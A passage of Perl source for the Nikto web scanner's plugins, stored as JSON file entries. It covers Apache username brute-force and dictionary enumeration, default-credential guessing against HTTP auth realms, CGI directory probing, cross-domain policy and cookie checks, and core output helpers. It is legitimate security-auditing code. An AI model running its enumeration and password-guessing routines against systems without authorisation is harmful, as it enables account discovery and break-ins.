whether we use a dictionary attack of brute force it\n            if (defined $dictfile) {\n\n                # We have options - assume it is a dictionary attack\n                nikto_user_enum_apache_dictionary($url, $mark, $dictfile);\n            }\n            else {\n                nikto_user_enum_apache_brute($url, $mark, $size);\n            }\n        }\n    }\n    if (defined $parameters->{'home'}) {\n        $url = \"/~\";\n\n        # First check whether we use a dictionary attack of brute force it\n        if (defined $dictfile) {\n\n            # We have options - assume it is a dictionary attack\n            nikto_user_enum_apache_dictionary($url, $mark, $dictfile);\n        }\n        else {\n            nikto_user_enum_apache_brute($url, $mark, $size);\n        }\n    }\n}\n\nsub nikto_user_enum_apache_brute {\n\n    # Note1: This script only generates names with letters A-Z (no numbers)\n    #\n    # Note2: this script will generate SUM(26^n)(n=$min to $max)\n    # it's probably faster to write this to a file than to generate it\n    # on the fly BTW.\n    #\n    # Of course, it could be optimized to skip some \"strange\"\n    # combinations of usernames, but hey, then it wouldn't\n    # be 'brute force' would it? (jfs)\n\n    my ($url, $mark, $size) = @_;\n    $size = 5 if ($size eq \"\");\n    nprint(\"- Enumerating Apache users (1 to $size characters).\", \"v\");\n\n    my $text    = \"a\";\n    my $ctr     = 0;\n    my $message = \"Valid users found via Apache enumeration: \";\n    my ($result, $content);\n    my @foundusers = ();\n    while (length($text) <= $size) {\n        return if $mark->{'terminate'};\n        if (($ctr % 500) eq 0) { nprint(\"- User enumeration guess $ctr ($text)\", \"v\"); }\n        ($result, $content, $errors, $request, $response) = nfetch($mark, $url . $text, \"HEAD\", \"\", \"\", \"\", \"user_enum_apache: enumeration\");\n        my $user = nikto_user_enum_apache_check($result, $text);\n        if (defined $user && $user ne \"\") {\n            push(@foundusers, $user);\n        }\n        $text++;\n        $ctr++;\n    }\n    if (scalar(@foundusers)) {\n        add_vulnerability($mark, $message . join(', ', @foundusers), 999997, \"637\", \"HEAD\", \"/\", $request, $response);\n    }\n\n}\n\nsub nikto_user_enum_apache_dictionary {\n    my ($url, $mark, $filename) = @_;\n    my $message    = \"Valid users found via Apache enumeration: \";\n    my @foundusers = ();\n    my ($result, $content);\n    my $ctr = 0;\n\n    nprint(\"- Enumerating Apache users (using dictionary $filename).\", \"v\");\n    unless (open(IN, \"<$filename\")) {\n        nprint(\"+ ERROR: Unable to open dictionary file $filename: $!.\");\n    }\n\n    # Now attempt on each entry\n    while (<IN>) {\n        return if $mark->{'terminate'};\n        chomp;\n        s/\\#.*$//;\n\n        # remove preceding ~ just in case\n        s/^~//;\n        if ($_ eq \"\") { next }\n        if (($ctr % 500) == 0) { nprint(\"- User enumeration guess $ctr ($_)\", \"v\"); }\n        ($result, $content, $errors, $request, $response) = nfetch($mark, $url . $_, \"HEAD\", \"\", \"\", \"\", \"user_enum_apache: dictionary\");\n        my $user = nikto_user_enum_apache_check($result, $_);\n        if ($user) {\n            push(@foundusers, $user);\n        }\n        $ctr++;\n    }\n    close(IN);\n    if (scalar(@foundusers)) {\n        add_vulnerability($mark, $message . join(', ', @foundusers), 999997, \"637\", \"HEAD\", \"/\", $request, $response);\n    }\n}\n\nsub nikto_user_enum_apache_check {\n    (my $code, $user) = @_;\n    my $result = \"\";\n\n    foreach my $found (split(/ /, $VARIABLES{\"\\@HTTPFOUND\"})) {\n        if ($code eq $found) {\n            $result = $user;\n            last;\n        }\n    }\n\n    return $result;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_auth.plugin",
    "content": "#VERSION,2.04\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Search content for known bad strings\n###############################################################################\n\nsub nikto_auth_init {\n    my $id = { name        => 'auth',\n               full_name   => 'Guess authentication',\n               author      => 'Sullo/Tautology',\n               description => 'Attempt to guess authentication realms',\n               hooks       => {\n                          start => { method => \\&nikto_auth_load,\n                                     weight => 1,\n                                     },\n                          postfetch => { method => \\&nikto_auth,\n                                         weight => 19,\n                                         cond   => '$result->{whisker}->{code} eq 401',\n                                         },\n                          prefetch => { method => \\&nikto_auth_pre,\n                                        weight => 19,\n                                        },\n                            },\n               copyright => \"2010 Chris Sullo\"\n               };\n\n    use vars qw/$REALMS/;\n\n    return $id;\n}\n\n# Load up the database as soon as we can\nsub nikto_auth_load {\n    $REALMS = init_db(\"db_realms\");\n\n    if (defined $CLI{'hostauth'}) {\n        my @x = split(/:/, $CLI{'hostauth'});\n\n        my $HOSTAUTH = { nikto_id => \"700500\",\n                         realm    => (defined $x[2]) ? $x[2] : '@ANY',\n                         password => $x[1],\n                         id       => $x[0],\n                         message  => \"Credentials provided by CLI.\",\n                         };\n        unshift(@{$REALMS}, $HOSTAUTH);\n    }\n}\n\n# Prefetch method can only set a default if it exists, since we don't have\n# any returned 401 header. This may mean we send auth headers when they are not\n# required, but it shouldn't matter. It also means if there are multiple realms\n# the postfetch method will keep changing default...\nsub nikto_auth_pre {\n    my ($mark, $parameters, $request, $response) = @_;\n    if ($mark->{'realms'}{'default'}{'authtype'} ne '') {\n        LW2::auth_set($mark->{'realms'}{'default'}{'authtype'},\n                      $request,\n                      $mark->{'realms'}{'default'}{'id'},\n                      $mark->{'realms'}{'default'}{'password'});\n        $request->{'whisker'}->{'allow_short_reads'} = 1;\n        LW2::http_fixup_request($request);\n    }\n    return $request, $response;\n}\n\n# Split up www-authenticate to realm and method\nsub split_auth_header {\n    my $header = $_[0] || return;\n    my ($realm, $authtype);\n    my @authenticate = split(/=/, $header);\n    if ($authenticate[0] =~ /^ntlm/i) {\n        $realm = $authtype = 'ntlm';\n    }\n    else {\n        $realm = $authenticate[1];\n        $realm =~ s/^\\\"//;\n        $realm =~ s/\\\".*$//;\n        if ($authenticate[0] =~ /^basic/i) {\n            $authtype = 'basic';\n        }\n        elsif ($authenticate[0] =~ /^digest/i) {\n            $authtype = 'digest';\n        }\n    }\n    return $realm, $authtype;\n}\n\n# Actual authentication and retry takes place here.\n# If present, user-supplied credentials will be tried first\nsub nikto_auth {\n    my ($mark, $parameters, $request, $response) = @_;\n    my ($realm, $authtype) = split_auth_header($response->{'www-authenticate'});\n\n    # did we already test this realm?\n    if (exists $mark->{'realms'}{$realm}{'status'}) {\n        return $request, $response;\n    }\n\n    $authtype = 'basic' if $authtype eq '';\n    my ($body)     = $response->{'whisker'}->{'data'};\n    my ($uri)      = $response->{'whisker'}->{'uri'};\n    my ($method)   = $response->{'whisker'}->{'method'} || \"GET\";\n\n    unless (defined $response->{'www-authenticate'}) {\n        nprint(\"+ ERROR: No authentication header defined: $uri\",\"v\");\n        return $request, $response;\n    }\n\n    nprint(\"+ $uri - Requires Authentication for realm '$realm'\")\n      if ($OUTPUT{'show_auth'} || $uri =~ /^$CLI{'root'}\\/?$/);\n\n    # Save to revert\n    $save_auth = $response->{'www-authenticate'};\n\n    nprint(\"- : Testing default credentials against '$realm'\",\"v\");\n\n    # Now we have this we can try guessing the password\n    foreach my $entry (@{$REALMS}) {\n        return if $mark->{'terminate'};\n        unless ($realm =~ /$entry->{'realm'}/i || $entry->{'realm'} eq '@ANY') { next; }\n\n        # Set up LW hash\n        LW2::auth_set($authtype, $request, $entry->{'id'}, $entry->{'password'});\n\n        # Patch to fix short reads\n        $request->{'whisker'}->{'allow_short_reads'} = 1;\n        LW2::http_fixup_request($request);\n\n        if ($authtype eq 'ntlm') {\n            $request->{'whisker'}->{'allow_short_reads'} = 1;\n        }\n\n        sleeper();\n        LW2::http_do_request_timeout($request, $response);    # test auth\n        $COUNTERS{'totalrequests'}++;\n        dump_var(\"Auth Request\",  $request);\n        dump_var(\"Auth Response\", $response);\n\tnprint(\"- Tested credentials: \" . $entry->{'id'} . \"/\" . $entry->{'password'} . \"- result: \" . $response->{'whisker'}->{'code'} ,\"v\");\n\n        $mark->{'realms'}{$realm}{'status'}   = 0;\n        $mark->{'realms'}{$realm}{'id'}       = $entry->{'id'};\n        $mark->{'realms'}{$realm}{'password'} = $entry->{'password'};\n        $mark->{'realms'}{$realm}{'authtype'} = $authtype;\n\n\n        #if ($response->{'www-authenticate'} eq '' && !defined $response->{'whisker'}->{'error'}) {\n        if ($response->{'whisker'}->{'code'} !~ /40[13]/ &&\n\t\t\t$response->{'whisker'}->{'code'} ne \"500\" &&\n\t\t\t!defined $response->{'whisker'}->{'error'}) {\n            unless ($entry->{'checked'} == 1) {\n                my $message;\n                if ($entry->{'message'} eq \"Credentials provided by CLI.\") {\n                    $message =\n                      \"Successfully authenticated to realm '$realm' with user-supplied credentials.\";\n                }\n                elsif ($entry->{'id'} eq '' && $entry->{'password'} eq '') {\n                    $message =\n                      \"Blank credentials found at $request{whisker}->{uri}, $entry->{'realm'}: $entry->{'msg'}.\";\n                }\n                else {\n                    $message =\n                      \"Default account found for '$realm' at $request->{'whisker'}->{'uri'} (ID '$entry->{'id'}', PW '$entry->{'password'}'). $entry->{message}.\";\n                }\n\n                add_vulnerability($mark, $message, $entry->{'nikto_id'}, 0, \"GET\", $request{'whisker'}->{'uri'}, $request, $response);\n\n                # Mark it successful\n                $entry->{'checked'}                 = 1;\n                $mark->{'realms'}{$realm}{'status'} = 1;\n                $mark->{'realms'}{'default'}        = $mark->{'realms'}{$realm};\n                last;\n            }\n        }\n        else {\n            $response->{'www-authenticate'} = $save_auth;\n        }\n    }\n    LW2::auth_unset(\\%request);\n\n    return $request, $response;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_cgi.plugin",
    "content": "#VERSION,2.06\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Perform CGI tests\n###############################################################################\nsub nikto_cgi_init {\n    my $id = { name        => \"cgi\",\n               full_name   => \"CGI\",\n               author      => \"Sullo\",\n               description => \"Enumerates possible CGI directories.\",\n               hooks       => { recon => { method => \\&nikto_cgi, }, },\n               copyright   => \"2008 Chris Sullo\",\n               };\n    return $id;\n}\n\nsub nikto_cgi {\n    my ($mark) = @_;\n    my ($gotvalid, $gotinvalid) = 0;\n    my @POSSIBLECGI = ();\n    my @CFGCGI = (split(/ /, $VARIABLES{'@CGIDIRS'}));\n    my ($res, $content, $possiblecgidir, $found) = \"\";\n\n    if (defined $CLI{'forcecgi'} && $CLI{'forcecgi'} eq \"all\")  # force all possible CGI dirs to be \"true\"\n    {\n        nprint(\"Using all known CGI directories\\n\", \"d\");\n        $VARIABLES{'@CGIDIRS'} = join(\" \", @CFGCGI);\n    }\n    elsif (defined $CLI{'forcecgi'} && $CLI{'forcecgi'} eq \"none\")    # force no CGI directories\n    {\n        nprint(\"- No CGI directories are set\\n\", \"v\");\n        $VARIABLES{'@CGIDIRS'} = \"\";\n    }\n    elsif (defined $CLI{'forcecgi'}\n           && $CLI{'forcecgi'} =~ /[a-zA-Z0-9]/)                      # force a specific directory\n    {\n        nprint(\"Using CGI dir \\'$CLI{'forcecgi'}\\'\\n\", \"d\");\n        $VARIABLES{'@CGIDIRS'} = $CLI{'forcecgi'};\n    }\n    else    # or normal testing of each dir\n    {\n        foreach $possiblecgidir (@CFGCGI) {\n            return if $mark->{'terminate'};\n            ($res, $content) = nfetch($mark, $possiblecgidir, \"GET\", \"\", \"\", \"\", \"cgi dir check\");\n            nprint(\"Checked for CGI dir\\t$possiblecgidir\\tgot:$res\", \"d\");\n            if ((content_present($res) eq TRUE) || ($res eq 403)) {\n                $gotvalid++;\n                push(@POSSIBLECGI, $possiblecgidir);\n            }\n        }\n\n        if ($gotvalid eq 0) {\n            nprint(\"+ No CGI Directories found (use '-C all' to force check all possible dirs)\");\n            $VARIABLES{'@CGIDIRS'} = \"\";\n        }\n        elsif ($#CFGCGI eq $#POSSIBLECGI) {\n            nprint(\"+ All CGI directories 'found', use '-C none' to test none\");\n            $VARIABLES{'@CGIDIRS'} = join(\" \", @CFGCGI);\n        }\n        else {\n            $VARIABLES{'@CGIDIRS'} = join(\" \", @POSSIBLECGI);\n        }\n    }    # end !$CLI{'forcecgi'}\n\n    nprint(\"- Checking for CGI in: $VARIABLES{'@CGIDIRS'}\", \"v\");\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_clientaccesspolicy.plugin",
    "content": "#VERSION,1.00\n###############################################################################\n#  Copyright (C) 2012 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check out the crossdomain.xml file\n###############################################################################\nsub nikto_clientaccesspolicy_init {\n    my $id = {\n            name      => \"clientaccesspolicy\",\n            full_name => \"clientaccesspolicy.xml\",\n            author    => \"Sullo, Dirk\",\n            description =>\n              \"Checks whether a client access file exists, and if it contains a wildcard entry.\",\n            hooks => { recon => { method => \\&nikto_clientaccesspolicy,\n                                  weight => 49,\n                                  },\n                         },\n            copyright => \"2012 Chris Sullo and Dr. Wetter IT-Consulting\"\n            };\n    return $id;\n}\n\nsub nikto_clientaccesspolicy {\n    my ($mark) = @_;\n    my $msg;\n    my $file = \"/clientaccesspolicy.xml\";\n\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $file, \"GET\", \"\", \"\", \"\", \"clientaccesspolicy\");\n\n    if (($res eq 200) || ($res eq $FoF{'okay'}{'response'})) {\n        if (is_404($file, $content, $res, $response->{'location'})) { return; }\n        if ($content !~ /access-policy/) { return; }\n\n        my $DISCTR = 0;\n        foreach my $line (split(/\\n/, $content)) {\n            chomp($line);\n            $line =~ s/\\#.*$//;\n            if ($line eq \"\") { next; }\n            elsif (($line =~ /<domain\\suri=\"(?:http:\\/\\/)?\\*\"/) ||\n            \t($line =~ /<allow-http-request-headers-from\\sdomain=\"\\*\"/)) {\n                add_vulnerability($mark, $mark->{'root'} . \"$file contains a full wildcard entry. See http://msdn.microsoft.com/en-us/library/cc197955(v=vs.95).aspx\", 999982, 0, \"GET\", $file, $request, $response);\n            }\n            else {\n                $DISCTR++;\n            }\n        }    # end foreach my $line\n\n\t\t$msg =  $mark->{'root'} . \"$file contains $DISCTR \" . (($DISCTR > 1)?\"lines\":\"line\") . \" which should be manually viewed for improper domains or wildcards.\";\n\n        if ($msg ne '') {\n            add_vulnerability($mark, $msg, 999981, 0, \"GET\", $file, $request, $response);\n        }\n    }\n\n    $file = \"/crossdomain.xml\" ;\n    ($res, $content, $error, $request, $response) = nfetch($mark, $file, \"GET\", \"\", \"\", \"\", \"crossdomain\");\n\n    if (($res eq 200) || ($res eq $FoF{'okay'}{'response'})) {\n        if (is_404($file, $content, $res, $response->{'location'})) { return; }\n\n\t\tmy $domainlist=\"\";\n        my $DISCTR = 0;\n        foreach my $line (split(/\\n/, $content)) {\n            chomp($line);\n            $line =~ s/\\#.*$//;\n            if ($line eq \"\") { next; }\n            elsif ($line =~ /allow-access-from\\sdomain=\"\\*\"/) {\n                add_vulnerability($mark, $mark->{'root'} . \"$file contains a full wildcard entry. See http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html\", 999975, 0, \"GET\", $file, $request, $response);\n            }\n            elsif ($line =~ /allow-access-from/ && $line =~ /\\*\\./ ) {\n                $DISCTR++;\n\t\t\t\tmy $domain = $line;\n\t\t\t\t$domain =~ s/^(.*allow-access-from domain=\\\")//;\n\t\t\t\t$domain =~ s/\\\" ?\\/\\>.*$//;\n\t\t\t\t$domainlist .= \"$domain \";\n            }\n        }    # end foreach my $line\n\n\t\t$msg =  $mark->{'root'} . \"$file contains $DISCTR \";\n\t\t$msg .= ($DISCTR > 1)?\"lines\":\"line\";\n\t\t$msg .= \" which include the following domains: $domainlist\";\n\n        if ($DISCTR > 0) {\n            add_vulnerability($mark, $msg, 999956, 0, \"GET\", $file, $request, $response);\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_content_search.plugin",
    "content": "#VERSION,2.05\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Search content for known bad strings\n###############################################################################\n\nsub nikto_content_search_init {\n    use vars qw/$CONTENTSEARCH %CSMATCHED/;\n    my $id = { name        => \"content_search\",\n               full_name   => \"Content Search\",\n               author      => \"Sullo\",\n               description => \"Search resultant content for interesting strings\",\n               hooks       => {\n                          start => { method => \\&nikto_content_search_load,\n                                     weight => 1,\n                                     },\n                          postfetch => { method => \\&nikto_content_search,\n                                         weight => 20,\n                                         },\n                            },\n               copyright => \"2010 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_content_search_load {\n\n    # Load up the database as soon as we can\n\n    $CONTENTSEARCH = init_db(\"db_content_search\");\n    %CSMATCHED     = ();\n\n    # to try and speed it up - precompile the regular expressions\n    foreach my $testid (@$CONTENTSEARCH) {\n        $testid->{'compiled'} = qr/$testid->{'matchstring'}/;\n    }\n}\n\nsub nikto_content_search {\n    my ($mark, $parameters, $request, $response) = @_;\n\n    my $body   = $response->{'whisker'}->{'data'};\n    my @uri    = LW2::uri_split($response->{'whisker'}->{'uri'});\n    my $file   = $uri[0];\n    my $method = $response->{'whisker'}->{'method'} || \"GET\";\n\n    foreach my $testid (@$CONTENTSEARCH) {\n        # Check whether we've already matched it\n        if (($CSMATCHED{ $mark->{'hostname'} }{$file} != 1) && ($body =~ $testid->{'compiled'})) {\n\n            my $outmessage = \"$file: $testid->{'message'}\";\n            add_vulnerability($mark, $outmessage, $testid->{'nikto_id'}, $testid->{'osvdb'}, $method, $file, $request, $response);\n            $CSMATCHED{ $mark->{'hostname'} }{$file} = 1;\n        }\n    }\n    return $request, $response;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_cookies.plugin",
    "content": "#VERSION,2.05\n###############################################################################\n#  Copyright (C) 2010 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# General HTTP cookie checks\n###############################################################################\nsub nikto_cookies_init {\n    my $id = {\n         name        => \"cookies\",\n         full_name   => \"HTTP Cookie Internal IP\",\n         author      => \"Sullo\",\n         description => \"Looks for internal IP addresses in cookies returned from an HTTP request.\",\n         hooks       => { postfetch => { method => \\&nikto_cookies_postfetch, }, },\n         copyright   => \"2010 Chris Sullo\"\n         };\n\n\t# Store cookies to ensure we don't report multiple times.\n\tmy %CFOUND;\n    return $id;\n}\n\nsub nikto_cookies_postfetch {\n    my ($mark, $parameters, $request, $response) = @_;\n\n    if (!exists $response->{'set-cookie'}) {\n        return $request, $response;\n    }\n\n    foreach my $c (@{ $response->{'whisker'}->{'cookies'} }) {\n\t\tmy $c2 = $c;\n\t\t$c =~ /([^=]+)+=([^;]+)/;\n\t\tmy $cname = $1;\n        my $cvalue = $2;\n\t\tnext if (defined $CFOUND{$cname}{$mark->{hostname}});\n\n\t\t# secure flag\n\t\tif ($c !~ /secure/i && $mark->{ssl}) {\n\t\t\tadd_vulnerability($mark, \"Cookie $cname created without the secure flag\", 999960, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $response);\n\t\t}\n\n\t\t# httponly flag\n\t\tif ($c !~ /httponly/i) {\n\t\t\tadd_vulnerability($mark, \"Cookie $cname created without the httponly flag\", 999961, 0, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $response);\n\t\t}\n\n        my @ips = get_ips($c);\n\n        if (substr($cname,0,4) eq 'NSC_'){\n            push(@ips, decode_netscaler_cookie($cvalue));\n        }\n\n        foreach my $ip (@ips) {\n            my ($valid, $internal, $loopback) = is_ip($ip);\n            if ($valid && !$loopback) {\n                if ($ip ne $mark->{'ip'}) {\n                    my $msg   = \"\";\n                    my $osvdb = 0;\n\n                    if ($cname eq 'ARPT') {\n                        $msg =\n                          \"Cisco content switch reveals internal IP address found in the '$cname' cookie. The IP is \\\"$ip\\\".\";\n                        $osvdb = 28121;\n                    }\n                    else {\n\n                        # is it an internal, or just different?\n                        my $int;\n                        if ($internal) { $int = \"RFC-1918 \"; }\n                        $msg = $int . \"IP address found in the '$cname' cookie. The IP is \\\"$ip\\\".\";\n                    }\n                    add_vulnerability($mark, $msg, 999991, $osvdb, $request->{'whisker'}->{'method'}, $request->{'whisker'}->{'uri'}, $request, $response);\n                }\n            }\n        }\n\t\t$CFOUND{$cname}{$mark->{hostname}}=1;\n    }\n}\n\nsub decode_netscaler_cookie {\n    my ($cookie_val) = @_;\n    $cookie_val =~ /[0-9a-f]{8}([0-9a-f]{8}).*([0-9a-f]{4})$/;\n    my $ip_value = hex($1) ^ 0x03081e11;\n    my $port_value = hex($2) ^ 0x3630;\n    \n    $ip_hex_str = sprintf(\"0x%X\", $ip_value);\n    $ip_hex_zero_pad = sprintf(\"%08s\", substr($ip_hex_str, 2, 8));\n    return hex('0x' . substr($ip_hex_zero_pad,0,2)) . \".\" . hex('0x' . substr($ip_hex_zero_pad,2,2)) . \".\" . hex('0x' . substr($ip_hex_zero_pad,4,2)) . \".\" . hex('0x' . substr($ip_hex_zero_pad,6,2));\n}\n\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_core.plugin",
    "content": "#VERSION,2.1.5\n\n###############################################################################\n#  Copyright (C) 2006 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Nikto core functionality\n###############################################################################\n\nsub change_variables {\n\n    my $line = $_[0];    # $line is the unfiltered variable\n    my @subtests;        # @subtests is the returned array of expanded variables\n    my $cooked;\n\n    my $shname = $mark->{'hostname'} || $mark->{'ip'};\n    $line =~ s/\\@IP/$mark->{'ip'}/g;\n    $line =~ s/\\@HOSTNAME/$shname/g;\n    $line =~ s/JUNK\\(([0-9]+)\\)/LW2::utils_randstr($1)/e;\n\n    if ($line !~ \"\\@\") {\n        push(@subtests, $line);\n    }\n    else {\n        foreach my $varname (keys %VARIABLES) {\n            if ($line =~ /$varname/) {\n\n                # We've found the variable; expand it\n                foreach my $value (split(/ /, $VARIABLES{$varname})) {\n                    $cooked = $line;\n                    $cooked =~ s/$varname/$value/g;\n                    push(@subtests, change_variables($cooked));\n                }\n            }\n        }\n    }\n\n#            if ($line =~ /CGIDIRS/) {\n#                print \"changed CGI Dirs\\n\";\n#                for ($i=0;$i<=$#subtests;$i++) { print \"\\t$i\\t$subtests[$i]\\n\"; }\n#\t\t exit;\n# \t\t}\n    return @subtests;\n}\n\nsub unslash {\n    my $line = $_[0] || return;    # $line is the slash-escaped variable\n    my @line = split(/\\\\\\\\/, $line);\n    foreach (@line) {\n        $_ =~ s/\\\\a/\\a/g;\n        $_ =~ s/\\\\b/\\b/g;\n        $_ =~ s/\\\\e/\\e/g;\n        $_ =~ s/\\\\f/\\f/g;\n        $_ =~ s/\\\\n/\\n/g;\n        $_ =~ s/\\\\r/\\r/g;\n        $_ =~ s/\\\\t/\\t/g;\n        $_ =~ s/\\\\x([[:xdigit:]]2)/chr(hex($1))/ge;\n    }\n    return join(\"\\\\\", @line);\n}\n\n###############################################################################\nsub is_404 {\n    my ($uri, $content, $rescode, $loc_header) = @_;\n    $ext = get_ext($uri);\n\n    if ((($FoF{$ext}{'mode'} eq \"STD\") || ($FoF{$ext}{'mode'} eq '')) && ($rescode =~ /4[0-9][0-9]/)) {\n        return 1;\n    }\n    elsif ($FoF{$ext}{'mode'} eq \"REDIR\") {\n        if (get_base_host($loc_header) eq $FoF{$ext}{'location'}) {\n            return 1;\n        }\n    }\n    elsif (($FoF{$ext}{'type'} eq \"BLANK\") && ($content eq \"\")) {\n        return 1;\n    }\n    elsif ($FoF{$ext}{'type'} eq \"HASH\") {\n        my $content = rm_active_content($content, $uri);\n        if (LW2::md4($content) eq $FoF{$ext}{'match'}) {\n            return 1;\n        }\n    }\n\n    # Note: ERRCODES are checked in nikto_tests.plugin as they\n    # take precedent over ALL other tests\n    foreach my $string (keys %{ $VARIABLES->{'ERRSTRINGS'} }) {\n        if ($content =~ /$string/i) {\n            return 1;\n        }\n    }\n\n    return 0;\n}\n\n###############################################################################\nsub scrub {\n\tmy (@s, $line);\n\t($line, $s[0], $s[1], $s[2], $s[3], $s[4]) = @_;\n\n\tforeach my $i (@_) {\n\t\tnext if $i eq \"\";\n\t\tif (is_ip($i)) {\n\t\t\t$line =~ s/$i/0\\.\\0\\.\\0\\.0/g;\n\t\t}\n\t\telse {\n\t\t\t$line =~ s/$i/example.com/ig;\n\t\t}\n\t}\n\n        # name\n# print \"hostname: \" . $mark->{'hostname'} .\"\\n\";\n        $line =~ s/$mark->{'hostname'}/example.com/ig unless $mark->{'hostname'} eq '';\n\n        # ip\n        $line =~ s/$mark->{'ip'}/0.0.0.0/ig unless $mark->{'ip'} eq '';\n#print \"ip: \" . $mark->{'ip'} .\"\\n\";\n\n        # vhost\n        $line =~ s/$CLI{'vhost'}/example.com/ig unless $CLI{'vhost'} eq '';\n#print \"vhost: \" . $mark->{'vhost'} .\"\\n\";\n\n        # and in case we got here from set_target\n        $line =~ s/$mark->{'ident'}/example.com/ig unless $mark->{'ident'} eq '';\n#print \"ident: \" . $mark->{'ident'} .\"\\n\";\n\n#print \"line2: $line\\n\";\n\treturn $line;\n\n}\n###############################################################################\nsub nprint {\n    my $line   = shift;\n    my $mode   = shift;\n    my ($mark) = @_;\n    chomp($line);\n\n    # scrub values\n    if ($OUTPUT{'scrub'}) {\n\t$line = scrub($line, $mark->{'hostname'}, $mark->{'ip'}, $CLI{'vhost'}, $mark->{'ident'});\n\n        # name\n        #$line =~ s/$mark->{'hostname'}/example.com/ig unless $mark->{'hostname'} eq '';\n\n        # ip\n        #$line =~ s/$mark->{'ip'}/0.0.0.0/ig unless $mark->{'ip'} eq '';\n\n        # vhost\n        #$line =~ s/$CLI{'vhost'}/example.com/ig unless $CLI{'vhost'} eq '';\n\n        # and in case we got here from set_target\n        #$line =~ s/$mark->{'ident'}/example.com/ig unless $mark->{'ident'} eq '';\n    }\n\n    # don't print debug & verbose to output file...\n    if ($mode ne '') {\n        if ($mode eq \"d\" && $OUTPUT{'debug'}) {\n            print STDERR \"D:\" . localtime() . \" $line\\n\";\n        }\n        if ($mode eq \"v\" && $OUTPUT{'verbose'}) {\n            print \"V:\" . localtime() . \" $line\\n\";\n        }\n        if ($mode eq \"e\" && $OUTPUT{'errors'}) {\n            print \"E:\" . localtime() . \" $line\\n\";\n        }\n        return;\n    }\n\n    # print errors to STDERR\n    if ($line =~ /^\\t?\\+ ERROR:/) { print STDERR \"$line\\n\"; return; }\n\n    # don't print to STDOUT if output file is \"-\"\n    if ((defined $CLI{'file'}) && ($CLI{'file'} eq \"-\")) { return; }\n\n    $line =~ s/(CVE\\-[12][0-9]{3}-[0-9]{4,5})/http:\\/\\/cve.mitre.org\\/cgi-bin\\/cvename.cgi?name\\=$1/g;\n    $line =~ s/(CA\\-[12][0-9]{3}-[0-9]{2})/http:\\/\\/www.cert.org\\/advisories\\/$1.html/g;\n    $line =~ 